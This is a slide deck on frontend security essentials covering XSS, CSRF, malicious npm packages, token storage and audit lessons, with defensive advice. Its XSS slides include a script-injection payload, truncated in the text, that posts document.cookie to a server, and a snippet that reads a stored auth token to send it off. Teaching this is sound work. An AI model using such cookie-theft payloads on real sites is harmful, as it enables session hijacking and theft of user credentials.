FE Security Essentials 

Types of Hackers and why


White hat

Has permission.

i.e: like penetration testers.


Gray hat

for learning and usually cause no damage, and they might report it to you.


Black hat

for personal gain and because they can.

How it happens

  • The attacker will gather information about your system.
  • Google vulnerabilities.
  • Find an opening into your system.
  • Use the opening and get lucky to cause serious damage.

XSS Attacks

Cross-Site Scripting

  • The most common vulnerability in FE apps.
  • Categorized as an "Injection" attack.
  • While most modern frameworks protect you, it can still happen.

Most imporantly, why the X?

Because we already have CSS

<h1>Hello {{ audience }}</h1>
audience = "Robusta's Team";
<h1>Hello Robusta's Team</h1>
audience = "<script>alert('EZ clap');</script>";
  Hello <script>alert('EZ Clap');</script>

Just alerts? No big deal, right?

audience = `<script>
 { method: 'post', body: document.cookie })

And all users' cookies are now being sent to someone else which might contain auth tokens


XSS Attacks

What to look for

  • `window.innerHTML` anywhere.
  • `v-html` directive in Vue.js
  • `dangerouslySetInnerHTML` in React.js
  • `[innerHTML]` prop binding in Angular.

If you must use them, make sure to sanitize the text before passing it

XSS Attacks

a Silver Bullet 🔫

If you can, make use of `CSP`

"Content-Security-Policy" header allows you to craft specific rules for executing JavaScript

res.set('Content-Security-Policy', "script-src 'self' http://localhost:3000")

CSRF Attacks

Cross-Site Request Forgery

  • The attacker doesn't even need to run code on your app.
  • Takes advantage of Cookies being sent with requests.
  • Uses phishing and social engineering and some luck.

CSRF Attacks

How it works

  • Attacker builds a form that submits to an endpoint (bank)
  • Once the form is submitted it will include all cookies.
  • The attacker doesn't know if you are authenticated or not.
  • Requests are authorized and you are out of money.

CSRF Attacks


CSRF Attacks

How to protect from it

  • "Server" shouldn't use cookies to authenticate.
  • If it must, then it should have a `CSRF-TOKEN` and validate it.

Malicious Packages

Don't grab anything from NPM

  • The attacker publishes a package that seems harmless.
  • Anyone that adds it via `npm` or `yarn` is now affected.

Malicious Packages


Malicious Packages

How can you be safe?

🔃 Update packages regularly

🌟 Check Github stars

📈 Check weekly downloads

👀 Check source code

Authorization Tokens

Where to store them

Candidate #1


  • The attacker should be aware of the item key to be able to retrieve it in their injected scripts.
  • Client-side only, which means the app needs an initialization step to identify the user.

Candidate #2


  • The attacker should be aware of the item key to be able to retrieve it in their injected scripts.
  • Client-side only, which means the app needs an initialization step to identify the user.
  • The attacker will give up trying to read it because of the very easy API.
var DBOpenRequest = window.indexedDB.open("appData", 4);
DBOpenRequest.onsuccess = function(event) {    
  db = DBOpenRequest.result;
  var transaction = db.transaction(["authData"], "readwrite");
  var objectStore = transaction.objectStore("authData");
  var objectStoreRequest = objectStore.get("auth_token");
  objectStoreRequest.onsuccess = function(event) {
    // send this to server

Candidate #3

Cookies 🍪

  • It can have `secure` and `httpOnly` flags which makes them unreadable from any script.
  • It can have an expiration date.
  • It can be scoped to specific paths.
  • It can be set and read by both Client and Server.

IRL Lessons

From Secure Misr Reports

  • They didn't like us using the Cookie to store tokens.
  • But since there was not a single XSS vulnerability it didn't even matter if the Cookie was insecure or didn't have `httpOnly` flag.
  • The only issues were `man in the middle attacks` which are eliminated if the app is using HTTPS.

IRL Lessons

From Secure Misr Reports

Worst offender: Encoding user info in JWT tokens and decoding them on the FE to get user identity

 Advanced issue found

IRL Lessons

From Secure Misr Reports

The fix: Treat the JWT as an opaque value, don't assume it has any useful information, it's just a pass you show to your API

 Advanced issue found


Thanks 👋

FE Security Essentials

By Abdelrahman Awad

FE Security Essentials

  • 1,029